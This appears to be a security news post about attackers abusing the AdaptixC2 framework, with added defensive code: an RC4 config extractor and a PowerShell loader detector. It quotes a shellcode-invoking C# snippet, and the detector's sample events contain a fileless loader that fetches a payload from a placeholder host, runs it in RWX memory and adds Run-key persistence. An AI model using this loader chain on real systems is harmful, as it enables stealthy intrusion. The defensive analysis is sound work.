Cyber Web Spider Blog – News

Threat Actors Leveraging Open-Source AdaptixC2 in Real-World Attacks

Posted on September 11, 2025 By CWS

In early May 2025, security teams began observing a sudden rise in post-exploitation activity leveraging an open-source command-and-control framework known as AdaptixC2.

Originally developed to assist penetration testers, the framework offers a range of capabilities, including file system manipulation, process enumeration, and covert channel tunneling, which have now been adopted by malicious actors.

The framework's modular design and extensibility through "extenders" make it particularly attractive to adversaries seeking a customizable toolkit that can evade conventional defenses.

Palo Alto Networks researchers noted that AdaptixC2 remained largely under the radar until threat intelligence feeds began reporting infections across multiple sectors.

One early campaign relied on social engineering via fake help desk remote assistance requests, tricking users into starting Quick Assist sessions that launched a multi-stage PowerShell loader.

Within minutes, adversaries achieved in-memory execution of the beacon without dropping any files to disk, sidestepping endpoint detection measures and establishing persistent control over the victim host.

As incidents proliferated, a distinct cluster of intrusions emerged involving AI-generated scripts designed to deploy AdaptixC2.

Palo Alto Networks analysts identified stylistic markers, such as numbered comments and verbose output confirmations, that pointed to code produced by large language models.

These scripts not only downloaded and decoded a Base64-encoded payload, but also used .NET's GetDelegateForFunctionPointer to execute shellcode directly in memory.

By leveraging built-in Windows APIs such as VirtualProtect and CreateProcess, attackers achieved stealthy deployment and reliable persistence.

Across both scenarios, the impact has been significant. Compromised environments have seen lateral movement facilitated by SOCKS4/5 tunneling and port forwarding, enabling data exfiltration in small chunks that blend in with normal traffic patterns.

In one documented case, adversaries combined AdaptixC2 with Fog ransomware in an attack against a financial institution in Asia, demonstrating the framework's versatility and its potential to amplify downstream payloads.

Organizations relying on legacy detection methods found themselves ill-prepared for this modular, evolving threat.

AdaptixC2 server (Source – Palo Alto Networks)

The graphical view of connected agents and sessions, highlighting how attackers map available targets and plan multi-stage operations.

Beacon HTTP builder UI (Source – Palo Alto Networks)

The encrypted configuration parameters: the RC4-encrypted configuration is stored alongside its key in the PE header, allowing rapid customization of communication profiles. Because the key ships inside the binary, the encryption hides the profile from string searches but not from an analyst who knows the layout.
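The following is an added example, not AdaptixC2 code and not its real profile format, showing why a configuration whose RC4 key is stored next to the ciphertext can be recovered statically. The blob layout (4-byte little-endian ciphertext length, ciphertext, then a 16-byte key), the profile fields and the sample values are assumptions made for the illustration; the approach carries over to any layout once the parser has been worked out.

```python
"""Added example (not AdaptixC2 project code): a key stored beside its RC4
ciphertext turns encryption into obfuscation. The blob layout used here,
<u32 LE ct_len> || ciphertext || 16-byte key, is an ASSUMPTION for the
example, not the real AdaptixC2 beacon profile format."""
import json
import struct


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


KEY_LEN = 16  # assumed key size for the example layout


def build_blob(profile: dict, key: bytes) -> bytes:
    """Builder side (assumed layout): ct_len || rc4(profile JSON) || key."""
    ct = rc4(key, json.dumps(profile, sort_keys=True).encode())
    return struct.pack("<I", len(ct)) + ct + key


def extract_profile(blob: bytes) -> dict:
    """Analyst side: parse the same layout and recover the profile.
    No brute force is needed because the key travels with the data."""
    (ct_len,) = struct.unpack("<I", blob[:4])
    ct = blob[4:4 + ct_len]
    key = blob[4 + ct_len:4 + ct_len + KEY_LEN]
    if len(ct) != ct_len or len(key) != KEY_LEN:
        raise ValueError("blob truncated: ciphertext or key missing")
    return json.loads(rc4(key, ct).decode())


# Constructed sample profile; field names and values are illustrative,
# not observed indicators.
SAMPLE_PROFILE = {
    "hosts": ["cdn.example.invalid:443"],
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "kill_date": "2025-12-31",
    "working_time": "08:00-18:00",
}
SAMPLE_KEY = bytes(range(0x10, 0x20))

if __name__ == "__main__":
    blob = build_blob(SAMPLE_PROFILE, SAMPLE_KEY)
    print(extract_profile(blob))
```

In a real sample the work is locating the parser's offsets and key length in the beacon, not breaking the cipher; once those are known, the same extractor runs over every build from that operator.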

Infection Mechanism via Fileless PowerShell Loader

One of the most insidious aspects of AdaptixC2 deployment is its fileless infection mechanism, executed entirely in memory to evade disk-based defenses.

The initial vector often begins with a seemingly innocuous PowerShell script, delivered via a social engineering email or a remote assistance prompt.

Upon execution, the script invokes Invoke-RestMethod to retrieve a Base64-encoded shellcode payload from a legitimate cloud storage service.

Attack vector of AdaptixC2 installation on the victim machine (Source – Palo Alto Networks)

It then decodes this payload and calls VirtualAlloc to allocate a memory region with PAGE_EXECUTE_READWRITE permissions.

Using reflection and dynamic invocation, the loader constructs a delegate pointing to the shellcode entry point:

// Marshal is System.Runtime.InteropServices.Marshal; shellcodePtr is the RWX region returned by VirtualAlloc
var ptr = Marshal.GetDelegateForFunctionPointer(shellcodePtr, typeof(Action));
((Action)ptr)();  // invoking the delegate transfers control to the shellcode in memory

This approach sidesteps the need for a written executable, leaving minimal forensic artifacts. Following successful execution, the script uses CreateShortcut to place a shortcut in the user's Startup folder, or writes a Run key to the registry under an innocuous name such as "Updater", ensuring that the beacon survives reboots.

Detection evasion is further enhanced by configurable KillDate and WorkingTime parameters, which restrict beacon activity to pre-defined windows, and by customizable User-Agent strings and HTTP headers.

Security teams must therefore enrich telemetry with memory-based detections and network-behavior analytics to intercept these in-flight payloads before they fully establish their C2 channels.

Continuous monitoring for dynamic invocation APIs and anomalous PowerShell child processes remains critical to disrupting this modern, fileless infection chain.
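As an added example, not from the page or from Palo Alto Networks, the detector below applies the monitoring advice in this section to the loader chain just described: it looks for the download, Base64 decode, RWX allocation, delegate invocation and Startup/Run persistence stages co-occurring in one PowerShell script block, and separately flags PowerShell launched from a parent that is rarely legitimate. The events are constructed, simplified dicts standing in for script-block logging (Event ID 4104) and process-creation telemetry rather than real log parsing; the indicator set, the threshold of three stages and the suspicious-parent list are tunable assumptions.

```python
"""Added example (not from the page or Palo Alto Networks): detection logic
for the fileless AdaptixC2 loader chain, run over constructed sample events.
Event dicts mimic PowerShell script-block logs (EID 4104) and process
creation, but are simplified stand-ins, not a real log parser."""
import re
from dataclasses import dataclass, field

# Each stage alone is common in admin scripts; the loader is suspicious
# because several stages appear together in a single script block.
LOADER_INDICATORS = [
    ("download",    re.compile(r"Invoke-RestMethod|Invoke-WebRequest|DownloadString", re.I)),
    ("b64_decode",  re.compile(r"FromBase64String", re.I)),
    ("rwx_alloc",   re.compile(r"VirtualAlloc[^\n]*?(0x40\b|PAGE_EXECUTE_READWRITE)", re.I)),
    ("delegate",    re.compile(r"GetDelegateForFunctionPointer", re.I)),
    ("persistence", re.compile(r"CreateShortcut[^\n]*Startup|CurrentVersion\\Run", re.I)),
]
LOADER_THRESHOLD = 3  # assumption: 3+ distinct stages in one block is worth an alert

# Assumption: parents from which an interactive PowerShell is rarely legitimate.
SUSPICIOUS_PARENTS = {"quickassist.exe", "winword.exe", "excel.exe", "outlook.exe", "mshta.exe"}


@dataclass
class Finding:
    rule: str
    event_id: int
    matched: list = field(default_factory=list)


def score_script_block(text: str) -> list:
    """Return the names of loader stages present in one script block."""
    return [name for name, rx in LOADER_INDICATORS if rx.search(text)]


def detect(events: list) -> list:
    """Run both rules over a list of simplified events, in order."""
    findings = []
    for ev in events:
        if ev["type"] == "script_block":
            hits = score_script_block(ev["text"])
            if len(hits) >= LOADER_THRESHOLD:
                findings.append(Finding("fileless_loader_chain", ev["id"], hits))
        elif ev["type"] == "process_create":
            image = ev["image"].rsplit("\\", 1)[-1].lower()
            parent = ev["parent"].rsplit("\\", 1)[-1].lower()
            if image in {"powershell.exe", "pwsh.exe"} and parent in SUSPICIOUS_PARENTS:
                findings.append(Finding("powershell_unusual_parent", ev["id"], [parent]))
    return findings


# Constructed sample events; URLs and paths are placeholders, not observed IOCs.
SAMPLE_EVENTS = [
    {"id": 1, "type": "script_block", "text":
     "$b=[Convert]::FromBase64String((Invoke-RestMethod 'https://storage.example.invalid/p.txt'))\n"
     "$p=[Win32]::VirtualAlloc(0,$b.Length,0x3000,0x40)\n"
     "[Runtime.InteropServices.Marshal]::Copy($b,0,$p,$b.Length)\n"
     "$f=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($p,[Action]); $f.Invoke()\n"
     "Set-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name Updater -Value 'powershell -w hidden ...'"},
    {"id": 2, "type": "script_block", "text":
     "$r = Invoke-RestMethod 'https://api.example.invalid/health'\nWrite-Output $r.status"},
    {"id": 3, "type": "process_create",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Windows\\System32\\quickassist.exe"},
    {"id": 4, "type": "process_create",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Event 2 is a benign health check that downloads something but does nothing else, and is correctly left alone; the loader block trips all five stages. In production the same logic would run over decoded script-block text from the PowerShell operational log, where loaders that split stages across several blocks need the scores aggregated per process rather than per event.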
